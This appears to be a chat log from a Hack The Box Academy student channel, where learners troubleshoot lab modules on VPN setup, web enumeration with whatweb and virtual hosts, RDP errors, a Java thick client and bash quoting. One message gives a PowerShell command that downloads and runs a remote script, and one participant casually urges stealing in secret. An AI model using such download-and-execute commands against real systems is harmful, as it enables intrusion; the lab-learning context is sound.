Because that’s you..
can you browse the website?
Do you though
yes let me try something
The problem is you have 20 tun interfaces
ps aux | grep openvpn
you can look up the most popular CMSes and try to look for those on the site or in the html source
Thanks a lot it works
?
🤦♂️
That command is to show how many openvpn processes are running
If there's more than 1 (excluding grep) that's a problem
I mean I killed all the openvpn then tried again and it worked to ping it
So what I told you to do 10 minutes ago
We should apply -9 in order to kill all the processes related to openvpn, 'cause killall just removes one process
It should kill all labeled openvpn but whatever works for you
Thanks again for ur help
ok I am browsing the website and I tried curl -I and it's not getting me anything, and online resources can't identify it because it's a private IP address
view source doesn't show me the CMS
You can still use curl with private ips
¯_(ツ)_/¯
You need to add the hosts entries stated above the questions
(to the /etc/hosts file)
Also this ^
I know but I did and the CMS didn't show up
I did curl -I
hold on a sec
The answer is there
Whatweb is a good tool for enumerating as well
Funny, that's mentioned in the module, I think?
I tried whatweb already but cms not there
in fact I tried it multiple times
I can tell you it does
ok I will try again
There's a line that explicitly says word! - Open source Content Management
The CMS isn't found with Curl -I
ok
You can use curl to find it, but you'll have to grep for keywords
I'm trying to find it with WhatWeb but this command I'm trying isn't working:
whatweb http://10.129.42.195/ -v --search-plugins="Content"
Anybody done the zephyr Pro labs
it gets me all plugins in existence with word content in them and not the ones for that IP
Its driving me crazy how stuck I am I don't understand
Because you need to use the vhost
The thing I'm supposed to do works in other environments
#prolabs-zephyr read and follow #welcome to access
#welcome verify yourself and you get access to #prolabs-zephyr zephyr chat
Im on mobile, you're too slow
Skill issue then
Had to look what's the channel for zephyr first
Also it might not be plug-ins. Just do the -a3 -v as shown
Learn to swipe.
ok
but I did that and I didn't see the cms
#prolabs- is usually how they start
Look for the words "content management", also: you NEED TO USE THE VHOST
app.inlanefreight.local
Yes, add that to /etc/hosts
As this ip is hosting 2 hosts, app.inlanefreight.local and dev.inlanefreight.local
Thank God the sun is out today.
┌─[us-academy-2]─[10.10.14.139]─[htb-ac-605555@htb-xwesdi4mrk]─[~]
└──╼ [★]$ whatweb -a3 http://app.inlanefreight.local -v
ERROR Opening: http://app.inlanefreight.local - no address for app.inlanefreight.local
┌─[us-academy-2]─[10.10.14.139]─[htb-ac-605555@htb-xwesdi4mrk]─[~]
└──╼ [★]$ whatweb -a3 app.inlanefreight.local -v
ERROR Opening: http://app.inlanefreight.local - no address for app.inlanefreight.local
Each question tells you which to look at
ok but how do I set vhost
It needs to be in your /etc/hosts
ok got it
As I told him 2 minutes ago...lol
ip host1 host2 host3...
I am trying to use socat on windows I am getting this error I tried putting my firewall down but it did not help
.\socat.exe TCP-LISTEN:8000,fork TCP:127.0.0.1:1337
2024/04/25 02:48:36 socat[16964] E connect(5, AF=2 127.0.0.1:1337, 16): Connection refused
And was told to him earlier
G0blin even told him lmfao
Password Attacks is almost over for me.
The hard lab was the most fun for me imo
Yeah, I'm a bit intimidated by the labs but I'll make it. I just hate having to use RDP.
It's clunky.
use tcp vpn and just let the lab sit for a few minutes before touching it ¯_(ツ)_/¯
Is there a way to convert a CMD reverse shell to Powershell?
Im doing 1 section per day lol
but for now didn't have any problems at password attacks (luckily i saw it many times marcie saying don't attack ssh on mitations lol) saved me a grey hair
so I have the hosts file open and I'm thinking I put it at the bottom?
powershell
Just add powershell
That helps 🙂
hello?
Hello, we hear you @sterile epoch ! 😉
What module?
attacking common applications thick clients
I checked in resource monitor
any idea about this?
Or you meant a cmd reverse code that would work via powershell terminal? Don't think so? I could be wrong.
solved it
Not that i can think of any. 
I tried in both my local machine and the remote foothold
Yeah I'm wondering if you can convert CMD into Powershell while connected to an endpoint via reverse shell.
Just type powershell and it drops you into a powershell session
Not that i know of. I mean you can run powershell stuff in cmd with an example
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4:443/mypowershell.ps1')"
(Mypowershell.ps1 long ass code)
But reverse shell, that's the same in cmd and powershell, not that i know of
I first decompiled the jar file > removed the 2 files in META-INF > removed the hashes from MANIFEST.MF > changed the port from 8000 to 1337 and then used the command jar -cmf .\META-INF\MANIFEST.MF ..\fatty_mod.jar *
I get the error htb.client.run.Starter not found
Party time 🥳
Is this CWEE...?!
CPTS
I agree but this particular module is taking me more than a month
I just hope they don't throw any thick applications in the exam
What...?!
What's your background?
I see. Yeah that's a tough segue.
But hey, when you're done with this cert you'll be a hacker 🙂
I think you need several certs before you can really call yourself that
tbh its not even certs that would do that
Nah.
true
you don't need any certs to be a hacker
I think to be considered an actual hacker, you need well-rounded skills not certs
If I can get into a corporate network and do XYZ...
I just hope its enough to boost my confidence
or you need very advanced skills in a few specific areas
Stuff your resume and go get a job, that helped me.
true true
i am trying but recession is hitting me hard
hacker is about the mentality and the skills
Just need this
Bro with this cert you can hit a corporate network and do quite a few things...I think that qualifies you as a hacker.
at this point I just want to learn new stuff
Especially when 76% of Azure AD tenants do NOT have MFA enabled.
I don't know if I want to go that far I mean you could say that. Just focusing on earning the cert is not enough tho. Do you have the life attitude of a hacker?
It doesn't take much.
ok
I mean I don't think it's about having one cert. That's like saying anyone who can spar in boxing is "a fighter" because they have intermediate fighting skill. It doesn't really work that way.
any advice with this?
I think to be taken seriously as a hacker you will need more than just intermediate skills
Have you checked the forums? Google?
and you need the attitude and mindset of a hacker
which is something you have to be born with
Nah.
no??
When you have no money for food, trust me... You figure out how to get it.
ok
You get very creative when you need to eat or pay your bills.
nobody is born with such an attitude or mindset
I always hated authority, so that was a start.
anyone is capable of acquiring those
ok
Imagine you're starving in a western nation... How do you get money to eat?
Yes but you don't want to go to jail so...
well, I don't want to have an argument I guess but I think we should definitely continue this conversation at some point
Then steal in secret
in htb forums they do not have any mentions with this but in stack overflow I found it
they said to double check the manifest file I did there was no mistake in the path
i think the Learning Process does an excellent job of teaching you the kind of mindset you should have
I'm gonna rest a little I'll talk to you guys later tonight
hmmm parrot doesn't have snmpwalk installed by default?
'My cheeseburger was supposed to be plain.'
and it demonstrates that anyone can achieve such a way of thinking
a quick search shows me
/usr/share/doc/libnet-snmp-perl/examples/snmpwalk.pl
Necessity is the ingredient that cooks talent the fastest and the best.
I need this cert to get on with Synack to get more moneys.
With Synack on my resume and a CVE, I can get back into security 🙂
Application Security Engineer || Beg for a pentester job...?
Application Security Engineer roles require the CWEE but... Much less competition.
As I said, necessity.
i just moved the script over to /usr/bin and did a chmod +x
Nice. Can you run the script?
yh
You catch the shell?
anything?
Anyone dealing w/ slower than usual target VMs in the modules or is it just me?
g0blin may know...?
its the same with me
In the module web edition, the question that said "submit the number of all "A" records from all zones as the answer", when I did and counted 19 the system says it is incorrect
all zones
Sorry, I don’t get it
you'll need to look for more
Look for another zone you can transfer to
Done, Thanks
Target is spawning... :/
Why is it so hard to keep a functioning target after 5pm EST?
I've had no issues
For me they run for about 2 minutes and poof
hello any help on why am I getting this error?
java -jar .\fatty-client-new.jar
Error: Could not find or load main class htb.fatty.client.run.Starter
if you're following the section precisely, that's why. the commands they give don't really follow what's actually going on
I can't connect to a target via RDP.
[16:24:35:074] [3423:3424] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[16:24:35:074] [3423:3424] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
Remmina doesn't work either.
your error indicates NLA is enabled
can you give the command
NLA is an additional security layer for remote desktop sessions requiring the user to authenticate to the remote machine before a full Remote Desktop session is established
Don't share commands that may be considered spoilers for modules over Tier 0, please.
At least not in public channels like this.
Take it to DM if you want to share info like that
sorry my bad, I asked for it since it looked like it was part of my path and I could help
I'm sorry, but it's just xfreerdp.
it contained creds
The creds are included in the lesson. And I can't even connect via pwnbox.
Provided in the lesson.
goblin can you help me with my error?
this one
I'm sorry no, I'm about to go to sleep
ok
So does anyone know when this will be fixed?
which path is it from?
Password Attacks.
link?
@valid viper you might try remmina instead of xfreerdp to connect. I just had to use that as I was getting the first error you were getting
I did.
Also tried bare metal, VM, and pwnbox. SSDD.
Used nmap and port 3389 is open.
I guess I'll switch my region and try to refresh my VPN.
Weird...I literally just did that module and had to install/use remmina which did connect for me. what error are you getting with that?
It's likely a timeout error or it could be a bad password
I managed to connect just fine
If it's for the first question, wrap the password in single quotes
Pay attention to the characters in the input, and how you might want to escape them
$$ is a variable call that calls the PID of the shell iirc
oh they gave the answer
Wasn't me that time, but what has been said above will get you moving forward
😐
Thank you, but I don't have that in my notes...?
it's part of bash
Because it's a quirk of bash/zsh
look into the bash scripting module
Single quotes tell bash that you are passing a literal string
it's helpful
So it doesn't try and resolve any perceived variable calls
I'm not seeing that in my notes...I know I've logged into other boxes via RDP without single quotes before.
Because those didn't have a pw which could be interpreted in a different manner by bash
those may not have special characters like # or $
Again not trying to be rude, just want to understand.
Aha, thank you.
❤️
More advanced modules like this assume you have some prior experience with the environment you're working with (in this case bash)
!,$,<,> are all special characters interpreted differently by bash
I do indeed have some.
As things like escaping strings, variables etc are all likely covered in earlier modules
! calls history
$ calls a variable
< and > are used to redirect input/output
| passes the output to another command as stdin
There's a handful of ways to escape
So because it contains $ I need to negate its value as a var via escaping.
Single quotes, \
It contains double $$ which is a var
Well yeah.